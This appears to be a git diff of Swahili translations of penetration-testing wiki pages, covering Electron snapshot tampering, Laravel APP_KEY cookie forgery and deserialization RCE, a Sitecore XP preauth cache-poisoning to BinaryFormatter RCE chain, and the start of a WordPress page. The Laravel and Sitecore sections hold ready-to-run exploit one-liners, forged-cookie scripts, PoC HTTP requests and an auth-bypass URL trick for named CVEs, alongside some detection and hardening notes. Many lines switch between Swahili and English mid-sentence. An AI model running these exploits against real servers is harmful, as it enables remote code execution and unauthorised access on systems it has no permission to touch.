- Kupitisha uadilifu/sahihi ya saini: Faili za snapshot hazichukuliwi kama native executables na ukaguzi wa code-signing na (kihistoria) hazikutumika chini ya fuses za Electron au udhibiti wa uadilifu wa Chromium.
- Uendelevu: Kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kawaida hudumu baada ya kuanzishwa upya kwa app na huonekana kama app iliyosainiwa, halali.
- Chromium browsers: Dhana ile ile ya kuharibu inatumika kwa Chrome/derivatives zilizowekwa katika maeneo yanayoweza kuandikwa na mtumiaji. Chrome ina hatua nyingine za ulinzi wa uadilifu lakini kwa uwazi inatoa kuwa mashambulizi ya kimwili yaliyopo mahali hayajumuishwi katika mfano wake wa tishio.
Ugundaji na hatua za kupunguza
- Treat snapshots as executable content and include them in integrity enforcement (CVE-2025-55305 fix).
- Prefer admin-writable-only install locations; baseline and monitor hashes for v8_context_snapshot.bin and browser_v8_context_snapshot.bin.
- Detect early-runtime builtin clobbering and unexpected snapshot changes; alert when deserialized snapshots do not match expected values.
Ugunduzi na hatua za kupunguza
- Tibu snapshots kama maudhui yanayoweza kutekelezwa na uzijumlishe kwenye utekelezaji wa uadilifu (CVE-2025-55305 fix).
- Pendelea maeneo ya usakinishaji yanayoweza kuandikwa tu na admin; tengeneza mstari wa msingi na fuatilia hashes za v8_context_snapshot.bin na browser_v8_context_snapshot.bin.
- Gundua ufisadi wa builtin kwa wakati wa awali wa runtime na mabadiliko yasiyotarajiwa ya snapshot; toa tahadhari wakati snapshots zilizodeserialishwa hazilingani na thamani zilizotarajiwa.
## **Marejeo**

100
src/network-services-pentesting/pentesting-web/laravel.md
View File

@ -8,10 +8,10 @@ Soma taarifa kuhusu hili hapa: [https://stitcher.io/blog/unsafe-sql-functions-in
---
## APP_KEY & Undani za Encryption (Laravel \u003e=5.6)
## APP_KEY & Encryption internals (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) pamoja na HMAC kwa integriti chini ya kifuniko (`Illuminate\\Encryption\\Encrypter`).
Ciphertext mbichi ambayo hatimaye **hutumwa kwa client** ni **Base64 ya JSON object** kama:
Laravel inatumia AES-256-CBC (au GCM) pamoja na uadilifu wa HMAC chini ya kifuniko (`Illuminate\\Encryption\\Encrypter`).
Ciphertext ghafi ambayo hatimaye **sent to the client** ni **Base64 of a JSON object** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
@ -20,7 +20,9 @@ Ciphertext mbichi ambayo hatimaye **hutumwa kwa client** ni **Base64 ya JSON obj
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` itafanya `serialize()` ya plaintext kwa default, wakati `decrypt($payload, $unserialize=true)` **ita `unserialize()` moja kwa moja** thamani iliyofichuliwa. Kwa hiyo **attacker yeyote anayejua siri ya 32-byte `APP_KEY` anaweza kutengeneza encrypted PHP serialized object na kupata RCE kupitia magic methods (`__wakeup`, `__destruct`, …)**.
`encrypt($value, $serialize=true)` itafanya `serialize()` ya plaintext kwa chaguo-msingi, wakati
`decrypt($payload, $unserialize=true)` **ita `unserialize()` moja kwa moja** ya thamani iliyofumbuliwa.
Hivyo **mtuhumiwa yeyote anayejua siri ya 32-byte `APP_KEY` anaweza kutengeneza objekti ya PHP iliyoserialishwa na iliyosimbwa na kupata RCE kupitia magic methods (`__wakeup`, `__destruct`, …)**.
Minimal PoC (framework ≥9.x):
```php
@ -29,12 +31,12 @@ use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Weka string iliyotengenezwa kwenye sink yoyote yenye udhaifu ya `decrypt()` (route param, cookie, session, …).
Injiza msururu uliotengenezwa ndani ya sink yoyote dhaifu ya `decrypt()` (route param, cookie, session, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) huotomatisha mchakato mzima na inaongeza hali inayofaa ya **bruteforce**:
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inaendesha mchakato mzima kiotomatiki na inaongeza njia rahisi ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
@ -45,25 +47,25 @@ laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
Scripti inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
The script inasaidia kwa uwazi payloads za CBC na GCM na inaunda tena sehemu ya HMAC/tag.
---
## Real-world vulnerable patterns
## Mifano ya udhaifu ya dunia halisi
| Mradi | Sink dhaifu | Gadget chain |
|-------|-------------|--------------|
| Project | Sinki yenye udhaifu | Gadget chain |
|---------|---------------------|--------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyonyaji ni daima:
1. Pata au jaribu kwa brute-force `APP_KEY` ya byte 32.
2. Jenga gadget chain na **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`).
3. Encrypt serialized gadget kwa **laravel_crypto_killer.py** na `APP_KEY` iliyopatikana.
4. Wasilisha ciphertext kwa sink dhaifu ya `decrypt()` (route parameter, cookie, session …) ili kusababisha **RCE**.
The exploitation workflow is always:
1. Pata au brute-force the 32-byte `APP_KEY`.
2. Jenga gadget chain with **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`).
3. Encrypt gadget iliyoserialiwa na **laravel_crypto_killer.py** na `APP_KEY` uliopatikana.
4. Tuma ciphertext kwa sinki yenye udhaifu `decrypt()` (route parameter, cookie, session …) ili kusababisha **RCE**.
Hapo chini kuna mistari fupi (one-liners) inayoonyesha njia kamili ya shambulio kwa kila CVE ya ulimwengu halisi iliyo tajwa hapo juu:
Hapo chini kuna mifano fupi za mstari mmoja (one-liners) zinazoonyesha njia kamili ya shambulio kwa kila CVE ya dunia halisi iliyotajwa hapo juu:
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
@ -80,38 +82,38 @@ php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
## Ugundaji mkubwa wa APP_KEY via cookie brute-force
## Ugunduzi wa APP_KEY kwa wingi kupitia cookie brute-force
Kwa sababu kila majibu mapya ya Laravel huweka angalau cookie iliyofichwa (`XSRF-TOKEN` na kawaida `laravel_session`), **public internet scanners (Shodan, Censys, …) leak mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa offline.
Kwa sababu kila response mpya ya Laravel inaweka angalau cookie iliyofichwa (`XSRF-TOKEN` na kawaida `laravel_session`), **public internet scanners (Shodan, Censys, …) leak mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa offline.
Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):
* Dataset Julai 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % keys cracked**
* >1 000 servers bado vulnerable to legacy CVE-2018-15133 kwa sababu tokens directly contain serialized data.
* Huge key reuse the Top-10 APP_KEYs ni hard-coded defaults zilizoshipwa na commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked**
* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.
* Utiririshaji mkubwa wa keys the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
Chombo binafsi cha Go **nounours** kinaboresha AES-CBC/GCM bruteforce throughput hadi ~1.5 billion tries/s, kukata muda wa full dataset cracking chini ya <2 minutes.
The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
## CVE-2024-52301 HTTP argv/env override → auth bypass
Wakati PHPs `register_argc_argv=On` (kawaida kwenye distros nyingi), PHP inaonyesha array `argv` kwa HTTP requests inayotokana na query string. Matoleo ya hivi karibuni ya Laravel yalichambua hizi “CLI-like” args na kuzingatia `--env=<value>` wakati wa runtime. Hii inaruhusu kubadilisha environment ya framework kwa HTTP request ya sasa kwa kuiongeza tu kwenye URL yoyote:
When PHPs `register_argc_argv=On` (typical on many distros), PHP exposes an `argv` array for HTTP requests derived from the query string. Recent Laravel versions parsed these “CLI-like” args and honored `--env=<value>` at runtime. This allows flipping the framework environment for the current HTTP request just by appending it to any URL:
- Quick check:
- Tembelea `https://target/?--env=local` au kamba yoyote na tazama mabadiliko yanayotegemea environment (debug banners, footers, verbose errors). Ikiwa kamba inaonekana reflected, override inafanya kazi.
- Visit `https://target/?--env=local` or any string and look for environment-dependent changes (debug banners, footers, verbose errors). If the string is reflected, the override is working.
- Impact example (business logic trusting a special env):
- Ikiwa app ina matawi kama `if (app()->environment('preprod')) { /* bypass auth */ }`, unaweza kuthibitisha bila creds sahihi kwa kutuma login POST kwa:
- If the app contains branches like `if (app()->environment('preprod')) { /* bypass auth */ }`, you can authenticate without valid creds by sending the login POST to:
- `POST /login?--env=preprod`
- Notes:
- Inaenda kwa kila-request, hakuna persistence.
- Inahitaji `register_argc_argv=On` na vulnerable Laravel version inayosoma argv kwa HTTP.
- Primitive muhimu kuonyesha errors zaidi katika “debug” envs au kuamsha code paths zilizo gatwa na environment.
- Works per-request, no persistence.
- Requires `register_argc_argv=On` and a vulnerable Laravel version that reads argv for HTTP.
- Useful primitive to surface more verbose errors in “debug” envs or to trigger environment-gated code paths.
- Mitigations:
- Zima `register_argc_argv` kwa PHP-FPM/Apache.
- Update Laravel ili isibris argv kwenye HTTP requests na ondoa assumptions za trust zinazohusiana na `app()->environment()` katika production routes.
- Disable `register_argc_argv` for PHP-FPM/Apache.
- Upgrade Laravel to ignore argv on HTTP requests and remove any trust assumptions tied to `app()->environment()` in production routes.
Minimal exploitation flow (Burp):
```http
@ -127,22 +129,22 @@ email=a@b.c&password=whatever&remember=0xdf
### Hali ya debugging
Ikiwa Laravel iko katika **debugging mode** utaweza kupata **code** na **sensitive data**.\
Iwapo Laravel iko katika **debugging mode**, utaweza kupata **code** na **sensitive data**.\
Kwa mfano `http://127.0.0.1:8000/profiles`:
![](<../../images/image (1046).png>)
Hali hii kawaida inahitajika kwa ku-exploit CVE nyingine za Laravel RCE.
Hii kwa kawaida inahitajika kwa kutumia exploits dhidi ya CVEs nyingine za Laravel RCE.
### Fingerprinting & exposed dev endpoints
### Fingerprinting & endpoints za dev zilizo wazi
Ukaguzi mfupi wa haraka kutambua stack ya Laravel na zana hatari za dev zilizo wazi katika production:
Mikaguzi ya haraka kutambua stack ya Laravel na dev tooling hatari zilizo wazi katika production:
- `/_ignition/health-check` → Ignition present (debug tool used by CVE-2021-3129). Ikiwa inafikika bila uthibitishaji, app inaweza kuwa katika debug au imepangwa vibaya.
- `/_debugbar` → Laravel Debugbar assets; mara nyingi inaashiria debug mode.
- `/telescope` → Laravel Telescope (dev monitor). Ikiwa ni public, tarajia ufichaji mkubwa wa taarifa na vitendo vinavyowezekana.
- `/horizon` → Queue dashboard; version disclosure na wakati mwingine vitendo vilivyolindwa na CSRF.
- `X-Powered-By`, cookies `XSRF-TOKEN` and `laravel_session`, and Blade error pages pia husaidia kutambulisha.
- `/_ignition/health-check` → Ignition ipo (debug tool used by CVE-2021-3129). Ikiwa inafikiwa bila uthibitisho, app inaweza kuwa katika debug mode au imepangwa vibaya.
- `/_debugbar` → Laravel Debugbar assets; mara nyingi zinaonyesha debug mode.
- `/telescope` → Laravel Telescope (dev monitor). Ikiwa ni ya umma, tarajia kufichuka kwa taarifa nyingi na vitendo vinavyowezekana.
- `/horizon` → Queue dashboard; inaweza kufichua version na wakati mwingine vitendo vinavyolindwa na CSRF.
- Header `X-Powered-By`, cookies `XSRF-TOKEN` na `laravel_session`, pamoja na kurasa za makosa za Blade pia husaidia kutambua.
```bash
# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
@ -151,11 +153,11 @@ for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https:/
```
### .env
Laravel huhifadhi APP inayotumiwa ku-encrypt cookies na taarifa nyingine za uthibitisho ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia path traversal chini ya: `/../.env`
Laravel huhifadhi APP inayotumiwa ku-encrypt cookies na sifa nyingine ndani ya faili iitwayo `.env` inayoweza kupatikana kwa kutumia path traversal chini ya: `/../.env`
Laravel pia itaonyesha taarifa hii ndani ya ukurasa wa debug (unaoonekana wakati Laravel inapata kosa na debug imewezeshwa).
Laravel pia itaonyesha taarifa hii ndani ya debug page (inayoonekana wakati Laravel inapopata kosa na ikiwa imewezeshwa).
Kwa kutumia APP_KEY ya siri ya Laravel unaweza decrypt na re-encrypt cookies:
Kwa kutumia siri ya APP_KEY ya Laravel unaweza decrypt na re-encrypt cookies:
### Decrypt Cookie
```python
@ -218,12 +220,12 @@ encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2Swe
```
### Laravel Deserialization RCE
Toleo zilizo hatarini: 5.5.40 na 5.6.x hadi 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Matoleo yaliyo hatarini: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Hapa unaweza kupata taarifa kuhusu deserialization vulnerability: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Hapa unaweza kupata taarifa kuhusu udhaifu wa deserialization: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Unaweza kujaribu na kui-exploit ukitumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kui-exploit kwa kutumia metasploit: `use unix/http/laravel_token_unserialize_exec`
Unaweza kujaribu na kui-exploit kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kui-exploit kwa metasploit: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
@ -231,7 +233,7 @@ Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https:
## Marejeo
## Marejeleo
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite dAPP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)

64
src/network-services-pentesting/pentesting-web/sitecore/README.md
View File

@ -2,12 +2,12 @@
{{#include ../../../banners/hacktricks-training.md}}
Ukurasa huu unatoa muhtasari wa mnyororo wa shambulio wa vitendo dhidi ya Sitecore XP 10.4.1 unaotoka kutoka kwenye preauth XAML handler hadi HTML cache poisoning na, kupitia authenticated UI flow, kufikia RCE kupitia BinaryFormatter deserialization. Mbinu hizi zinaweza kutumika kwa matoleo/vitengo vya Sitecore vinavyofanana na zinatoa primitives za kujaribu, kugundua, na kuimarisha.
Ukurasa huu unafupisha mlolongo wa shambulio wa vitendo dhidi ya Sitecore XP 10.4.1 ambao unasogeza kutoka preauth XAML handler hadi HTML cache poisoning na, kupitia authenticated UI flow, hadi RCE kupitia BinaryFormatter deserialization. Mbinu hizi zinaweza kutumika kwa toleo/vipengele vinavyofanana vya Sitecore na zinatoa primitives maalum za kujaribu, kugundua, na kuimarisha.
- Bidhaa iliyoathiriwa iliyojaribiwa: Sitecore XP 10.4.1 rev. 011628
- Imerekebishwa katika: KB1003667, KB1003734 (Juni/Julai 2025)
- Imerekebishwa katika: KB1003667, KB1003734 (June/July 2025)
Angalia pia:
See also:
{{#ref}}
../../../pentesting-web/cache-deception/README.md
@ -19,7 +19,7 @@ Angalia pia:
## Preauth primitive: XAML Ajax reflection → HtmlCache write
Entrypoint is the preauth XAML handler registered in web.config:
Sehemu ya kuingia ni preauth XAML handler iliyosajiliwa katika web.config:
```xml
<add verb="*" path="sitecore_xaml.ashx" type="Sitecore.Web.UI.XamlSharp.Xaml.XamlPageHandlerFactory, Sitecore.Kernel" name="Sitecore.XamlPageRequestHandler" />
```
@ -27,7 +27,7 @@ Inapatikana kupitia:
```
GET /-/xaml/Sitecore.Shell.Xaml.WebControl
```
Mti wa controls unajumuisha AjaxScriptManager ambayo, kwenye maombi ya matukio, husoma maeneo yaliyodhibitiwa na mshambuliaji na kwa kutumia reflection huitekeleza methods kwenye controls zilizolengwa:
Mti wa udhibiti unajumuisha AjaxScriptManager ambayo, kwenye maombi ya tukio, husoma mashamba yanayodhibitiwa na mshambuliaji na kwa reflection huitekeleza mbinu kwenye vidhibiti vilivyolengwa:
```csharp
// AjaxScriptManager.OnPreRender
string clientId = page.Request.Form["__SOURCE"]; // target control
@ -42,7 +42,7 @@ if (m != null) m.Invoke(this, e.Parameters);
// Alternate branch for XML-based controls
if (control is XmlControl && AjaxScriptManager.DispatchXmlControl(control, args)) {...}
```
Uchunguzi muhimu: ukurasa la XAML una mfano wa XmlControl (xmlcontrol:GlobalHeader). Sitecore.XmlControls.XmlControl inatokana na Sitecore.Web.UI.WebControl (darasa la Sitecore), ambalo linapitisha ReflectionUtil.Filter allowlist (Sitecore.*), likifungua methods kwenye Sitecore WebControl.
Uchunguzi muhimu: ukurasa wa XAML una mfano wa XmlControl (xmlcontrol:GlobalHeader). Sitecore.XmlControls.XmlControl unatokana na Sitecore.Web.UI.WebControl (darasa la Sitecore), ambalo linapitia ReflectionUtil.Filter allowlist (Sitecore.*), likifungua mbinu kwenye Sitecore WebControl.
Magic method for poisoning:
```csharp
@ -52,9 +52,9 @@ HtmlCache c = CacheManager.GetHtmlCache(Sitecore.Context.Site);
if (c != null) c.SetHtml(cacheKey, html, this._cacheTimeout);
}
```
Kwa sababu tunaweza kulenga xmlcontrol:GlobalHeader na kuita Sitecore.Web.UI.WebControl methods kwa jina, tunapata preauth arbitrary HtmlCache write primitive.
Kwa sababu tunaweza kulenga xmlcontrol:GlobalHeader na kuita mbinu za Sitecore.Web.UI.WebControl kwa jina, tunapata preauth arbitrary HtmlCache write primitive.
### Ombi la PoC (CVE-2025-53693)
### PoC request (CVE-2025-53693)
```
POST /-/xaml/Sitecore.Shell.Xaml.WebControl HTTP/2
Host: target
@ -63,12 +63,12 @@ Content-Type: application/x-www-form-urlencoded
__PARAMETERS=AddToCache("wat","<html><body>pwn</body></html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
Vidokezo:
- __SOURCE ni clientID ya xmlcontrol:GlobalHeader ndani ya Sitecore.Shell.Xaml.WebControl (kwa kawaida thabiti kama ctl00_ctl00_ctl05_ctl03 kwa kuwa hutokana na XAML isiyobadilika).
- __SOURCE ni clientID ya xmlcontrol:GlobalHeader ndani ya Sitecore.Shell.Xaml.WebControl (kwa kawaida thabiti kama ctl00_ctl00_ctl05_ctl03 kwani inatokana na XAML thabiti).
- __PARAMETERS muundo ni Method("arg1","arg2").
## Nini cha poison: Ujenzi wa Cache key
## Nini cha kuchafulia: Ujenzi wa ufunguo wa Cache
Ujenzi wa kawaida wa HtmlCache key unaotumiwa na Sitecore controls:
Ujenzi wa kawaida wa ufunguo wa HtmlCache unaotumika na vidhibiti vya Sitecore:
```csharp
public virtual string GetCacheKey(){
SiteContext site = Sitecore.Context.Site;
@ -90,13 +90,13 @@ return k;
return string.Empty;
}
```
Mfano wa targeted poisoning kwa sublayout inayojulikana:
Mfano wa targeted poisoning kwa sublayout iliyojulikana:
```
__PARAMETERS=AddToCache("/layouts/Sample+Sublayout.ascx_%23lang:EN_%23login:False_%23qs:_%23index","<html>…attacker HTML…</html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
## Kuorodhesha vipengee vinavyoweza kuwekwa kwenye cache na vipimo vya “vary by”
## Kuorodhesha vitu vinavyoweza kuhifadhiwa kwenye cache na vipimo vya “vary by”
Ikiwa ItemService imefunuliwa (kibaya) kwa watu wasiojulikana, unaweza kuorodhesha vipengee vinavyoweza kuwekwa kwenye cache ili kupata funguo sahihi.
Ikiwa ItemService imefunuliwa (kibaya) kwa watumiaji wasiojulikana, unaweza kuorodhesha vipengele vinavyoweza kuhifadhiwa kwenye cache ili kupata funguo sahihi.
Jaribio la haraka:
```
@ -104,17 +104,17 @@ GET /sitecore/api/ssc/item
// 404 Sitecore error body → exposed (anonymous)
// 403 → blocked/auth required
```
Orodhesha vitu vinavyoweza kuhifadhiwa kwenye cache na bendera:
Orodhesha vitu vinavyoweza kuhifadhiwa kwenye cache na flags:
```
GET /sitecore/api/ssc/item/search?term=layouts&fields=&page=0&pagesize=100
```
Angalia sehemu kama Path, Cacheable, VaryByDevice, VaryByLogin, ClearOnIndexUpdate. Majina ya vifaa yanaweza kuorodheshwa kupitia:
Tafuta mashamba kama Path, Cacheable, VaryByDevice, VaryByLogin, ClearOnIndexUpdate. Majina ya vifaa yanaweza kuorodheshwa kupitia:
```
GET /sitecore/api/ssc/item/search?term=_templatename:Device&fields=ItemName&page=0&pagesize=100
```
### Sidechannel enumeration chini ya vitambulisho vilivyo na vikwazo (CVE-2025-53694)
### Sidechannel enumeration chini ya vitambulisho vilivyopunguzwa (CVE-2025-53694)
Hata pale ItemService inapojifanya akaunti iliyopunguzwa (e.g., ServicesAPI) na kurudisha array tupu ya Results, TotalCount bado inaweza kuonyesha preACL Solr hits. Unaweza bruteforce item groups/ids kwa wildcards na kutazama TotalCount ikijikusanya ili kuchora ramani ya internal content na devices:
Hata pale ItemService inapoiga akaunti iliyopunguzwa (kwa mfano, ServicesAPI) na kurudisha Results array tupu, TotalCount inaweza bado kuonyesha preACL Solr hits. Unaweza bruteforce item groups/ids kwa wildcards na kuangalia TotalCount ikikaribia ili ramani maudhui ya ndani na vifaa:
```
GET /sitecore/api/ssc/item/search?term=%2B_templatename:Device;%2B_group:a*&fields=&page=0&pagesize=100&includeStandardTemplateFields=true
→ "TotalCount": 3
@ -123,7 +123,7 @@ GET /...term=%2B_templatename:Device;%2B_group:aa*
GET /...term=%2B_templatename:Device;%2B_group:aa30d078ed1c47dd88ccef0b455a4cc1*
→ narrow to a specific item
```
## Postauth RCE: BinaryFormatter sink katika convertToRuntimeHtml (CVE-2025-53691)
## Postauth RCE: BinaryFormatter sink in convertToRuntimeHtml (CVE-2025-53691)
Sink:
```csharp
@ -131,14 +131,14 @@ Sink:
byte[] b = Convert.FromBase64String(data);
return new BinaryFormatter().Deserialize(new MemoryStream(b));
```
Inapatikana kupitia hatua ya pipeline convertToRuntimeHtml ConvertWebControls, ambayo inatafuta element yenye id {iframeId}_inner na hufanya base64 decode + deserializes yake, kisha inaingiza string inayotokana ndani ya HTML:
Inafikiwa kupitia hatua ya pipeline convertToRuntimeHtml ConvertWebControls, ambayo inatafuta kipengele chenye id {iframeId}_inner na hufanya base64 decode + deserialize yake, kisha inaingiza mnyororo uliotokana katika HTML:
```csharp
HtmlNode inner = doc.SelectSingleNode("//*[@id='"+id+"_inner']");
string text2 = inner?.GetAttributeValue("value", "");
if (text2.Length > 0)
htmlNode2.InnerHtml = StringUtil.GetString(Sitecore.Convert.Base64ToObject(text2) as string);
```
Chochea (iliyothibitishwa, haki za Content Editor). Dialogi ya FixHtml inaita convertToRuntimeHtml. Mchakato kamili bila kubofya UI:
Chochea (authenticated, Content Editor rights). Dialogu ya FixHtml inaita convertToRuntimeHtml. Mwishokwamwisho bila kubofya UI:
```
// 1) Start Content Editor
GET /sitecore/shell/Applications/Content%20Editor.aspx
@ -168,22 +168,22 @@ Gadget generation: use ysoserial.net / YSoNet with BinaryFormatter to produce a
## Mnyororo kamili
1) Mshambulizi wa Preauth anachafua HtmlCache na HTML yoyote kwa kuitisha kwa reflective WebControl.AddToCache kupitia XAML AjaxScriptManager.
2) HTML iliyochafuliwa hutumikia JavaScript inayomshawishi mtumiaji aliye authenticated wa Content Editor kupitia mtiririko wa FixHtml.
3) Ukurasa wa FixHtml unasababisha convertToRuntimeHtml → ConvertWebControls, ambayo inadekodeserializa base64 inayoendeshwa na mshambuliaji kupitia BinaryFormatter → RCE chini ya identity ya app pool ya Sitecore.
1) Preauth attacker poisons HtmlCache with arbitrary HTML by reflectively invoking WebControl.AddToCache via XAML AjaxScriptManager.
2) Poisoned HTML serves JavaScript that nudges an authenticated Content Editor user through the FixHtml flow.
3) The FixHtml page triggers convertToRuntimeHtml → ConvertWebControls, which deserializes attackercontrolled base64 via BinaryFormatter → RCE under the Sitecore app pool identity.
## Ugunduzi
- Preauth XAML: maombi kwa `/-/xaml/Sitecore.Shell.Xaml.WebControl` yenye `__ISEVENT=1`, `__SOURCE` isiyo ya kawaida na `__PARAMETERS=AddToCache(...)`.
- ItemService probing: spikes ya maswali ya wildcard kwa `/sitecore/api/ssc`, `TotalCount` kubwa na `Results` tupu.
- Deserialization attempts: `EditHtml.aspx` ikifuatiwa na `FixHtml.aspx?hdl=...` na base64 kubwa isiyo ya kawaida katika vikambu vya HTML.
- Preauth XAML: requests to `/-/xaml/Sitecore.Shell.Xaml.WebControl` with `__ISEVENT=1`, suspicious `__SOURCE` and `__PARAMETERS=AddToCache(...)`.
- ItemService probing: spikes of `/sitecore/api/ssc` wildcard queries, large `TotalCount` with empty `Results`.
- Deserialization attempts: `EditHtml.aspx` followed by `FixHtml.aspx?hdl=...` and unusually large base64 in HTML fields.
## Kuimarisha usalama
## Kukaza usalama
- Apply Sitecore patches KB1003667 and KB1003734; gate/disable preauth XAML handlers or add strict validation; fuatilia na weka ratelimit `/-/xaml/`.
- Ondoa/ibadilishe BinaryFormatter; zuia upatikanaji wa convertToRuntimeHtml au tekeleza uthibitisho mkali upande wa server kwa mtiririko wa uhariri wa HTML.
- Funga `/sitecore/api/ssc` kwa loopback au roles zilizo authenticated; epuka mifumo ya impersonation zinazoweza leak za side channels zenye msingi wa `TotalCount`.
- Leteza MFA/least privilege kwa watumiaji wa Content Editor; hakiki CSP ili kupunguza athari ya JS steering kutoka cache poisoning.
- Weka Sitecore patches KB1003667 na KB1003734; zuia/zimia preauth XAML handlers au ongeza uthibitisho mkali; angalia na weka ratelimit kwa `/-/xaml/`.
- Ondoa/badilisha BinaryFormatter; punguza ufikiaji wa convertToRuntimeHtml au utekeleze uthibitisho mzito upande wa server kwa HTML editing flows.
- Funga `/sitecore/api/ssc` kwa loopback au roles zilizo authenticated; epuka impersonation patterns ambazo zinatoa leak za sidechannels za `TotalCount`.
- Tekeleza MFA/least privilege kwa watumiaji wa Content Editor; pitia CSP ili kupunguza athari za JS steering kutokana na cache poisoning.
## References

354
src/network-services-pentesting/pentesting-web/wordpress.md
View File

@ -4,49 +4,49 @@
## Taarifa za Msingi
- **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
- **Themes files can be found in /wp-content/themes/,** hivyo ukibadilisha baadhi ya php ya theme ili kupata RCE huenda utatumia path hiyo. Kwa mfano: Using **theme twentytwelve** unaweza **access** faili **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **Uploaded** faili zinaenda kwa: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
- **Files za theme zinaweza kupatikana katika /wp-content/themes/,** hivyo ukibadilisha php ya theme ili kupata RCE huenda utatumia path hiyo. Kwa mfano: Kwa kutumia **theme twentytwelve** unaweza **kupata** faili **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **URL nyingine yenye msaada inaweza kuwa:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- Katika **wp-config.php** unaweza kupata root password ya database.
- Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
- Njia za kawaida za kuingia za kukagua: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
### **Main WordPress Files**
### **Faili Muhimu za WordPress**
- `index.php`
- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanidiwa.
- `wp-activate.php` inatumiwa kwa mchakato wa activation kwa email wakati wa kuanzisha tovuti mpya ya WordPress.
- Login folders (may be renamed to hide it):
- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosakinishwa.
